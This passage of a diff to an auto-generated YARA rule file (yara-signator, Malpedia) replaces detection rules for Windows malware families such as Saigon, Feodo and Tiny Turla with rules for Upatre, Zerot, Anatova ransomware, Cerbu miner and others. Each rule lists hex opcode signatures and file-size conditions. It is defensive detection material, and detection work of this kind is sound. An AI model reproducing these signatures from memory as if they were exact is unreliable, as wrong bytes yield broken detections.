+		$sequence_2 = { c744246cffffffff 488b01 4885c0 7464 4c8d44246c ba0a000000 ff5050 }
+		$sequence_3 = { e8???????? 89c7 85c0 0f8504f9ffff 8b4334 c7436801000000 4429e0 }
+		$sequence_4 = { e8???????? 89c3 85c0 0f84fc000000 31db 662e0f1f840000000000 4c89e2 }
+		$sequence_5 = { 7371 418b4120 85c0 755f 4881faffffff3f 7768 4883ec38 }
+		$sequence_6 = { c6431770 488d15d8461100 480f44fa 4d85e4 b8011a0000 48896b08 488d15d040fbff }
+		$sequence_7 = { e8???????? 4d85ff 7475 440fb74760 410fbf4e36 4139c8 7c66 }
+		$sequence_8 = { f77134 8d5001 4439fa 0f84b0010000 4531c9 4c8d442448 4489fa }
+		$sequence_9 = { e8???????? 4829c4 488b4548 4885c9 742d 4989ca 4883796800 }
 
 	condition:
-		7 of them and filesize < 1826816
+		7 of them and filesize < 27009024
 }
-rule MALPEDIA_Win_Saigon_Auto : FILE
+rule MALPEDIA_Win_Upatre_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d4227170-8c19-5a53-bfab-480d4b1c0eee"
+		id = "040bdafc-33da-58ba-b810-486451f4b678"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.saigon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.saigon_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.upatre_auto.yar#L1-L173"
 		license_url = "N/A"
-		logic_hash = "ca28ac861d15b6053acaf9126995909d99adf4b549ed8bfb0a57ebb9988cee44"
+		logic_hash = "3a267d65c074b009b5eb1fad7789aa126fe3aa82fa66dade27c6fa55c83ed7ca"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97183,32 +97405,38 @@ rule MALPEDIA_Win_Saigon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 85c0 0f85f4000000 488b0d???????? 33d2 41b800100000 }
-		$sequence_1 = { 33db 488bf2 4533c9 448d4303 }
-		$sequence_2 = { 418bd5 89542440 4533c9 4533c0 488bc8 895c2420 }
-		$sequence_3 = { 0f859d000000 488bcb ff15???????? 488b0d???????? 33d2 448d440034 ff15???????? }
-		$sequence_4 = { 488d842470020000 4c8d842440050000 488d942490030000 488d8c24c0000000 448bcb 895c2428 }
-		$sequence_5 = { e8???????? 488d8f88000000 ff15???????? f08387b000000001 488d8f88000000 ff15???????? 440fb65f66 }
-		$sequence_6 = { 0f8592000000 f60302 0f8589000000 448b6b08 }
-		$sequence_7 = { 4533c9 488bd0 498bce e8???????? 488b0d???????? 33d2 }
-		$sequence_8 = { 4885c9 740c 33d2 e8???????? 4c8be0 eb03 4533e4 }
-		$sequence_9 = { ff5038 85c0 781c 488b4c2430 4533c0 }
+		$sequence_0 = { b02f 66ab 8b45a8 ff5504 33c9 8ac8 ff5508 }
+		$sequence_1 = { b400 66ab b02f 66ab ff7590 33c0 }
+		$sequence_2 = { 81c60e010000 ac 3c01 740c b053 66ab }
+		$sequence_3 = { 6a00 8d4dc0 51 ff75e0 ff75bc ff75ec }
+		$sequence_4 = { 58 6a00 8d4de0 51 50 }
+		$sequence_5 = { 33c0 b404 57 03f8 8bf7 }
+		$sequence_6 = { b404 895d98 8bfb 03d8 b91c010000 }
+		$sequence_7 = { 33c0 66ab bbff0f0000 8b75f0 56 53 }
+		$sequence_8 = { 68d770a437 8b4dd4 51 e8???????? 8945e8 }
+		$sequence_9 = { 83c404 0fb7c0 3b4510 7411 8b4de0 51 }
+		$sequence_10 = { 83c410 eb58 8b4df4 8b510c 52 e8???????? }
+		$sequence_11 = { 1f c011a0 6b20bd 80978041a0e3b2 34c0 8fc0 81205b606d00 }
+		$sequence_12 = { 83c108 894dfc 8b55fc 8b02 50 e8???????? }
+		$sequence_13 = { 0fb745f8 0fb74df4 99 f7f9 }
+		$sequence_14 = { 0f8416010000 8b55f4 8b420c 50 e8???????? }
+		$sequence_15 = { 7529 8b4df4 8b5110 81c200100000 8955f0 8d45f0 }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 294912
 }
-rule MALPEDIA_Win_Downex_Auto : FILE
+rule MALPEDIA_Win_Zerot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "780df1d0-772a-58a4-934d-63bed6bd9744"
+		id = "3b855400-35e2-5ab9-8ab4-5b0c449639bd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.downex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.downex_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zerot_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "2787ed485caccd79e05aaa2383aa816bb0e34ab86d11b61c935876204e99082a"
+		logic_hash = "c6f6a84594f6a63be175c01b94d4ac1a205809bd4a3810282ffee82abc5e767b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97222,32 +97450,32 @@ rule MALPEDIA_Win_Downex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb6443b47 4b 2bf0 8d0440 8d0c82 8b84b7ec000000 8901 }
-		$sequence_1 = { ffb0d8f24700 e8???????? 83c40c 85c0 7419 46 8d0476 }
-		$sequence_2 = { e8???????? 8d8d58fdffff e8???????? 8b4da4 83c148 8d4601 50 }
-		$sequence_3 = { 297e04 83c40c 013e 017e08 8b4e04 83560c00 017e10 }
-		$sequence_4 = { eb2c b9???????? eb25 b9???????? eb1e 3ddec0c5b0 7412 }
-		$sequence_5 = { 7214 83c123 8b50fc 2bc2 83c0fc 83f81f 0f87d3030000 }
-		$sequence_6 = { ff7508 e8???????? 83c414 33d2 85c0 b900100000 0f44d1 }
-		$sequence_7 = { 85c0 0f85a0050000 f6872802010010 0f8407010000 8b8eb4000000 8bd1 68b5070000 }
-		$sequence_8 = { 50 e8???????? 68???????? 6aff ffb5f0feffff e8???????? 8bb5f8feffff }
-		$sequence_9 = { e8???????? 83c410 eb1f 81e7ffffdfff f7c200002000 7411 8d45e4 }
+		$sequence_0 = { e8???????? 83c404 33f6 eb13 6800006000 e8???????? }
+		$sequence_1 = { 6a00 6a00 ff15???????? a3???????? ff15???????? 3db7000000 7527 }
+		$sequence_2 = { 8b4608 c706???????? 85c0 740a 50 }
+		$sequence_3 = { 83c408 e9???????? 8b8d34fdffff bf???????? 83f904 }
+		$sequence_4 = { ff7610 6a01 ff760c ff15???????? }
+		$sequence_5 = { 6a00 6820020000 6a20 6a02 8d854cfeffff 66c78550feffff0005 50 }
+		$sequence_6 = { 7409 50 e8???????? 83c404 33ff c7850cfaffff00000000 32db }
+		$sequence_7 = { 6800020000 8d8510fdffff 6a00 50 e8???????? }
+		$sequence_8 = { 8d8524fdffff 50 8d4376 50 6a02 ffd6 8d851cfdffff }
+		$sequence_9 = { ff15???????? 8bc3 be19000000 43 }
 
 	condition:
-		7 of them and filesize < 1067008
+		7 of them and filesize < 303104
 }
-rule MALPEDIA_Win_Unidentified_112_Auto : FILE
+rule MALPEDIA_Win_Webc2_Table_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "088f625c-ef85-5039-b4a6-57af0a7b0b6b"
+		id = "74911130-496c-59cd-b9b7-d073dda2a5a6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_112"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_112_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_table"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_table_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "fc462a31ea1db66fb5cf9697b2cccafd272c6a5cfa6825d7930166b5fbdba921"
+		logic_hash = "82557b5976335e4f1972b3218d4e36ee8e0264f2a148ef98566fdf5b62d6108c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97261,34 +97489,34 @@ rule MALPEDIA_Win_Unidentified_112_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 4883ec38 488daa80000000 48817d70ff7f0000 762e c6858f00000000 c6858e00000000 }
-		$sequence_1 = { e8???????? 84c0 0f8496000000 b12c e8???????? 84c0 0f8487000000 }
-		$sequence_2 = { 498d4850 498b5040 4d8b4048 ff5010 4883bde001000000 7525 488b85d8020000 }
-		$sequence_3 = { e8???????? 498b4e50 ba50000000 41b808000000 e8???????? 488b45f0 49894650 }
-		$sequence_4 = { c1ea13 448d0c12 478d0c89 4429c8 0c30 8841ff 48ffc9 }
-		$sequence_5 = { e8???????? 84c0 0f841bf5ffff 488b05???????? 488b08 488b4138 4885c0 }
-		$sequence_6 = { 56 57 53 4883ec28 488daa80000000 488b8d48100000 488bb550100000 }
-		$sequence_7 = { c685de01000000 488d8d50010000 e8???????? eb71 488b8550010000 488b8d58010000 488b9560010000 }
-		$sequence_8 = { ba22000000 e8???????? e9???????? c685e305000001 488d0d4bd01500 4c8d053cd31500 ba22000000 }
-		$sequence_9 = { eb56 31f6 4989dd bf03000000 eb4a 0fb7ca 25ff030000 }
+		$sequence_0 = { ff15???????? b800100000 6a04 50 }
+		$sequence_1 = { 41 4e 75b7 8b45f8 be???????? 57 56 }
+		$sequence_2 = { e8???????? 85c0 59 7e1b 8b4c2404 }
+		$sequence_3 = { 0f8fdb000000 6860ea0000 ffd7 ff45f4 }
+		$sequence_4 = { c78548fdffff94000000 8d85e8feffff 50 8d85dcfbffff 50 e8???????? 59 }
+		$sequence_5 = { e8???????? 8b35???????? 8d8558ffffff 50 ff7508 ffd6 8bf8 }
+		$sequence_6 = { 50 8d85e4feffff 50 e8???????? 83c428 }
+		$sequence_7 = { 8bca 8dbd59ffffff f3ab 66ab aa 8bca 33c0 }
+		$sequence_8 = { ff15???????? ff7710 ff15???????? 83c410 50 ff15???????? }
+		$sequence_9 = { e8???????? 83c434 8d8548fdffff c78548fdffff9c000000 50 }
 
 	condition:
-		7 of them and filesize < 7317504
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Colony_Auto : FILE
+rule MALPEDIA_Win_Roopy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6de8851a-b1ef-561a-a63a-12519dea8778"
+		id = "8be7b2c4-b174-500b-b0ea-f2839cb0b383"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.colony_auto.yar#L1-L230"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.roopy_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "2b20de5492a48cc7fc726969d55d094c8002372f30c4bd6a4f1592aca3fb7fc0"
+		logic_hash = "e98d1af71e72ca48289280b30ed691a17624b5a4815404358ace55f7593ba961"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -97300,46 +97528,32 @@ rule MALPEDIA_Win_Colony_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 740f 0301 eb0b a801 }
-		$sequence_1 = { 32c0 8be5 5d c3 807d0800 56 57 }
-		$sequence_2 = { 8b4224 2b4220 660f6ec0 f30fe6c0 }
-		$sequence_3 = { 8b421c 2b4218 660f6ec0 f30fe6c0 }
-		$sequence_4 = { 8a4203 8841fe 8a4202 8841ff 8b02 c1e808 8801 }
-		$sequence_5 = { 334f14 8b45f4 894dfc 8bca c1e910 81e1ff000000 c1e808 }
-		$sequence_6 = { 69d200008f04 2bc8 c1e910 69c161a4f778 2bd0 }
-		$sequence_7 = { 7407 b901000000 eb0a 33c9 803f01 0f95c1 33c0 }
-		$sequence_8 = { 0fbed9 83eb30 eb13 8ac1 }
-		$sequence_9 = { 0f85bd000000 807dda01 751f 66a1???????? }
-		$sequence_10 = { 0f85bc000000 f30f7e05???????? 660fd606 a0???????? }
-		$sequence_11 = { 0f855b010000 8d7830 c7403c00000000 8d4838 eb0d 8d7824 }
-		$sequence_12 = { 8b00 83f801 7e5c f7420400080000 }
-		$sequence_13 = { 0f8fc9010000 0f84ad010000 3d09280000 0f8ff1000000 }
-		$sequence_14 = { 8b4214 2b4210 660f6ec0 f30fe6c0 }
-		$sequence_15 = { 0101 0101 0202 0202 0200 0102 0202 }
-		$sequence_16 = { 483305???????? 488bcb 488905???????? ff15???????? 488d15a9980000 }
-		$sequence_17 = { e9???????? 4c8d357e0c0100 488b0d???????? eb7b 4c8d35660c0100 }
-		$sequence_18 = { 48393d???????? 448bf0 0f85f8000000 488d0d687b0000 33d2 41b800080000 }
-		$sequence_19 = { e8???????? 488d15a3a50000 488d0d94a50000 e8???????? }
-		$sequence_20 = { 488bd7 488bcf 48c1f905 83e21f 4c8d05f8c70000 498b0cc8 486bd258 }
-		$sequence_21 = { 7519 4c8d05f3900000 8bd7 498bce }
-		$sequence_22 = { b91e000000 e8???????? b9ff000000 e8???????? 4803db 4c8d3590fc0000 }
-		$sequence_23 = { 488bc8 ff15???????? 488d15147b0000 488bcb 488905???????? }
+		$sequence_0 = { 8d45c0 30c9 ba38000000 e8???????? c745c0504b0606 8d45a8 }
+		$sequence_1 = { 8b45f8 c7401400000000 8b45f8 e8???????? c745f401000000 }
+		$sequence_2 = { 6631d2 8d85d8feffff e8???????? 8d45dc 30c9 6631d2 }
+		$sequence_3 = { 8b09 ff5164 8345f401 8b45f8 8b4004 e8???????? }
+		$sequence_4 = { c78580fdffff00000000 c78584fdffff00000000 c7858cfeffff00000000 31c0 }
+		$sequence_5 = { 6631c9 ba03010000 e8???????? 8b85b8feffff ba???????? }
+		$sequence_6 = { c7406000000000 8b45f4 c7406400000000 8b45f4 83785c00 770b 7210 }
+		$sequence_7 = { 30c9 6631d2 e8???????? 0fb745fc 68ff000000 8d8dd8feffff baffffffff }
+		$sequence_8 = { d805???????? d80d???????? 895df0 897df4 0fba65f41f df6df0 7306 }
+		$sequence_9 = { 8b52fc 29c2 8d4a01 8d5001 8b45fc e8???????? 89d8 }
 
 	condition:
-		7 of them and filesize < 7599104
+		7 of them and filesize < 739328
 }
-rule MALPEDIA_Win_Tiny_Turla_Auto : FILE
+rule MALPEDIA_Win_Anatova_Ransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "461da2a0-bc71-5807-a972-eaee61f0fc07"
+		id = "c0fa9d6b-6c59-5a94-9c37-0c291299bb78"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiny_turla"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tiny_turla_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.anatova_ransom_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "3923b1794e00bdddc4d622e58d3337c930d14bfa9ca9a2022fc0085649294c88"
+		logic_hash = "08ba2b5584d7af06c3ea6ab9e9a7449efbced637b501a285d62a4734bce8c105"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97353,32 +97567,32 @@ rule MALPEDIA_Win_Tiny_Turla_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c705????????04000000 488bc8 ff15???????? 85c0 742c 488bcb }
-		$sequence_1 = { 85c0 742c 488bcb e8???????? 488b0d???????? }
-		$sequence_2 = { 4883ec20 488b1a 488d15e0ffffff 488bcb }
-		$sequence_3 = { c705????????01000000 4883c420 5b 48ff25???????? }
-		$sequence_4 = { 4883ec20 488b1a 488d15e0ffffff 488bcb ff15???????? 488905???????? 4885c0 }
-		$sequence_5 = { 488bcb ff15???????? 488905???????? 4885c0 744a }
-		$sequence_6 = { c705????????01000000 4883c420 5b 48ff25???????? 4883c420 }
-		$sequence_7 = { 488d15e0ffffff 488bcb ff15???????? 488905???????? 4885c0 }
-		$sequence_8 = { ff15???????? 85c0 742c 488bcb e8???????? 488b0d???????? }
-		$sequence_9 = { ff15???????? 85c0 742c 488bcb e8???????? }
+		$sequence_0 = { 4c89da 4c8b1d???????? 41ffd3 488b45d8 4989c3 }
+		$sequence_1 = { 4989c2 4c89d1 4c89da e8???????? 488b05???????? 4881c000020000 8b0d???????? }
+		$sequence_2 = { 0f8405000000 e9???????? 48b80000100000000000 e9???????? 488b45e8 48b90000000000000000 48894c2420 }
+		$sequence_3 = { 488985c0feffff 488b85c0feffff b938020000 8908 488b85c0feffff 4989c3 }
+		$sequence_4 = { e8???????? 0fb645ff 83f800 0f846f020000 }
+		$sequence_5 = { 8845fe 0fb645fe 83f800 0f840d010000 }
+		$sequence_6 = { 488b4d10 4801c1 8b45fc 4863c0 }
+		$sequence_7 = { 488b05???????? 4883f800 0f848f010000 488b05???????? 4883f800 0f847e010000 488b05???????? }
+		$sequence_8 = { b800000000 898574ffffff 8b8574ffffff 83f810 0f8dd3000000 }
+		$sequence_9 = { 48b80f00000000000000 4989c0 b800000000 4989c3 488d45b1 4989c2 4c89d1 }
 
 	condition:
-		7 of them and filesize < 217088
+		7 of them and filesize < 671744
 }
-rule MALPEDIA_Win_Bleachgap_Auto : FILE
+rule MALPEDIA_Win_Daolpu_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "273003cf-3dbb-5afb-a5ea-bb6d27dae595"
+		id = "3b0894e5-1a8e-5546-8c9e-1b741fdf5950"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bleachgap"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bleachgap_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.daolpu"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.daolpu_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "e20e0cd9d2a699ef9480dfe92d72685e3d909ce98e8e306df6822787c7e8d012"
+		logic_hash = "8005f7b5dce3eec7097b3ee19274ed96f4a8267ee8f070756b8e93cef441b9c0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97392,71 +97606,71 @@ rule MALPEDIA_Win_Bleachgap_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4110 89500c 8b4110 894210 8b442410 895110 894a0c }
-		$sequence_1 = { 8d8d80fdffff e8???????? 8d8d48feffff e8???????? 8ac3 8b4df4 64890d00000000 }
-		$sequence_2 = { c78514fdffff00000000 c78524fdffff00000000 c78528fdffff00000000 0f1000 0f118514fdffff f30f7e4010 660fd68524fdffff }
-		$sequence_3 = { 83f81f 0f8783010000 51 52 e8???????? 83c408 8b8d5cffffff }
-		$sequence_4 = { 52 e8???????? 83c408 8a85bffeffff eb61 8b55bc 83ff10 }
-		$sequence_5 = { 83c404 83ee01 7839 0f1f00 56 57 e8???????? }
-		$sequence_6 = { 6859040000 68???????? 68db000000 e9???????? 55 e8???????? 83c404 }
-		$sequence_7 = { 46 8ac8 84c0 75dc 84c0 0f845b020000 e9???????? }
-		$sequence_8 = { 8b542424 8b4c2440 89450c 03ca 8b44243c 894d10 8b04b8 }
-		$sequence_9 = { 8945d0 8d4344 8945d4 8d434c 8945d8 8d4354 8945dc }
+		$sequence_0 = { 7506 4883c460 5b c3 a804 7409 488d1dbe721100 }
+		$sequence_1 = { 7439 488b442470 488b8080000000 4883c008 4889442438 488b442470 488b4c2438 }
+		$sequence_2 = { 498bf8 488bf2 488bd9 0f85bc000000 80b9ae0a000000 0f85af000000 41b80f000000 }
+		$sequence_3 = { 48ffca 4d85f6 75ec e9???????? 83f840 0f85d0000000 4d8b7610 }
+		$sequence_4 = { 897c2428 448be2 44896c2424 8944242c 3801 0f8411050000 0f1f840000000000 }
+		$sequence_5 = { e8???????? 8b442428 c1f806 4898 488d0da3a10600 8b542428 83e23f }
+		$sequence_6 = { 498b4c2448 ff15???????? 0f104500 488bcd 410f110424 0f104d10 410f114c2410 }
+		$sequence_7 = { 66ffc3 66413bdf 0f864fffffff 488d15adc40a00 498bce e8???????? e9???????? }
+		$sequence_8 = { 7501 cc 48c744242000000000 41b951050000 4c8d05cd131200 488d158e141200 488d0dff151200 }
+		$sequence_9 = { e8???????? 0f57c0 f30f7f4558 4c896568 488b4d50 4c896550 ba10000000 }
 
 	condition:
-		7 of them and filesize < 4538368
+		7 of them and filesize < 2877440
 }
-rule MALPEDIA_Win_Feodo_Auto : FILE
+rule MALPEDIA_Win_Cerbu_Miner_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "294edd8e-79e5-57c8-8d21-3a46810574e0"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.feodo_auto.yar#L1-L118"
+		id = "77652d6a-745f-5552-8901-83bf555706f4"
+		date = "2023-12-06"
+		modified = "2023-12-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cerbu_miner_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "7ae2a34a3e8eb5aa6b8cbee0b549d59082912ee3877b6eb0ff9194b700931591"
+		logic_hash = "e4927a587588bc11053fcbade5bb9500364c9a656d383eb318cc8486464f3cce"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20231130"
+		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
+		malpedia_version = "20230808"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 747b 6a00 6800000008 }
-		$sequence_1 = { 85d2 740a 03ca 397144 75f3 8b7904 }
-		$sequence_2 = { 6a00 6a03 57 8d442424 50 ff15???????? }
-		$sequence_3 = { ff15???????? 85c0 743d 8d4c2404 }
-		$sequence_4 = { 56 6808020000 8d442444 50 }
-		$sequence_5 = { 83ec0c 56 57 33ff 57 6a02 6a02 }
-		$sequence_6 = { 8bf0 85f6 75e0 6a00 57 }
-		$sequence_7 = { 56 57 ff15???????? 8bf0 85f6 75e0 6a00 }
-		$sequence_8 = { 6a20 8d542404 52 ff15???????? 8d0424 50 }
-		$sequence_9 = { 743d 8d4c2404 51 8d542424 52 }
+		$sequence_0 = { 88b42480000000 eb3f 83e902 7433 83e904 7413 83e909 }
+		$sequence_1 = { 7412 48 8d0d0b360500 48 83c428 48 ff25???????? }
+		$sequence_2 = { 8d4601 c643012e 48 63c8 41 8d4602 48 }
+		$sequence_3 = { 85d2 7427 85c9 b800040000 41 b800080000 44 }
+		$sequence_4 = { f6473801 7402 eb18 48 8bcf ff15???????? f6473801 }
+		$sequence_5 = { e9???????? 45 8bfd 44 89ad50010000 e9???????? 44 }
+		$sequence_6 = { 48 89442420 e8???????? 48 8bd7 48 8bcb }
+		$sequence_7 = { 89b42418010000 8b74242c 83feff 7515 837f0c00 7c0f 48 }
+		$sequence_8 = { 8d057b52f9ff 48 894518 c745b0e6070000 48 c745c000000200 48 }
+		$sequence_9 = { 44 2bc0 44 8903 33c0 48 8b5c2438 }
 
 	condition:
-		7 of them and filesize < 270336
+		7 of them and filesize < 1040384
 }
-rule MALPEDIA_Win_Unidentified_107_Auto : FILE
+rule MALPEDIA_Win_Latentbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "63234ec8-e935-5a5a-a7c8-23180ee85d34"
+		id = "d1503e41-08e6-5adf-a875-66636893fe66"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_107"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_107_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.latentbot_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "8867f317de2ddfffcab36cc6ed6aa7b70e1fee92a8d78957e157f26440f20f17"
+		logic_hash = "c8242f2d9f053ebc06f18c04d8c5d76f7cd68171deb734a7f00fb470d56dc52c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97470,32 +97684,32 @@ rule MALPEDIA_Win_Unidentified_107_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7582 4989d8 31d2 4c89e9 e8???????? 4989d8 }
-		$sequence_1 = { 0f1f00 8b0b ffd7 4989c4 }
-		$sequence_2 = { 4989c7 48c7c13b43f72a e8???????? 4883c464 488b4c2408 488b542410 4c8b442418 }
-		$sequence_3 = { 4883f807 7e96 8b13 4883f80b 0f8f33010000 8b03 85c0 }
-		$sequence_4 = { 4989cc 85db 0f8e16010000 488b05???????? 4531c9 4883c018 }
-		$sequence_5 = { 48b9ca0e99c700000000 e8???????? 4989c7 48b9ca0e99c700000000 e8???????? }
-		$sequence_6 = { 8b5208 4901d0 4d39c4 0f828a000000 4183c101 4883c028 4139d9 }
-		$sequence_7 = { e8???????? 8b05???????? 85c0 0f8e57ffffff 83e801 488b1d???????? 31ff }
-		$sequence_8 = { 85db 0f8e16010000 488b05???????? 4531c9 4883c018 0f1f840000000000 }
-		$sequence_9 = { 8b560c 41b830000000 488d0c10 488b05???????? }
+		$sequence_0 = { 5f c3 55 8bec 8b4604 81ecdc020000 85c0 }
+		$sequence_1 = { 7505 be04000000 56 6800300000 8d44241c 50 6a00 }
+		$sequence_2 = { 8d4c2410 51 6aff ffd2 33c0 8703 }
+		$sequence_3 = { 8bc3 e8???????? 299ff42a0000 015e0c 295e10 015e14 8b87f42a0000 }
+		$sequence_4 = { ff5554 395d70 0f8689000000 833d????????06 752c 833d????????03 7434 }
+		$sequence_5 = { 83ec08 3bc2 7769 8d4c2404 51 8d542404 }
+		$sequence_6 = { 50 e8???????? 0145f8 837df805 8945e8 72e7 }
+		$sequence_7 = { 7814 8d5002 85d2 7406 8d440802 eb02 }
+		$sequence_8 = { 8b413c 53 03c1 0fb74814 56 0fb77006 33db }
+		$sequence_9 = { 66890477 46 3bf3 72ea 33c0 66890477 }
 
 	condition:
-		7 of them and filesize < 254976
+		7 of them and filesize < 401408
 }
-rule MALPEDIA_Win_Naplistener_Auto : FILE
+rule MALPEDIA_Win_Logtu_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a3d7d9df-de3a-516e-b81c-c3cfa9ffc96f"
+		id = "f949c271-e440-5637-a6d2-753c8d4bcb2d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.naplistener"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.naplistener_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.logtu"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.logtu_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "2510a61e053aa5f210d742699c248976270de6ea89c8a2ddd06d921dbbb47612"
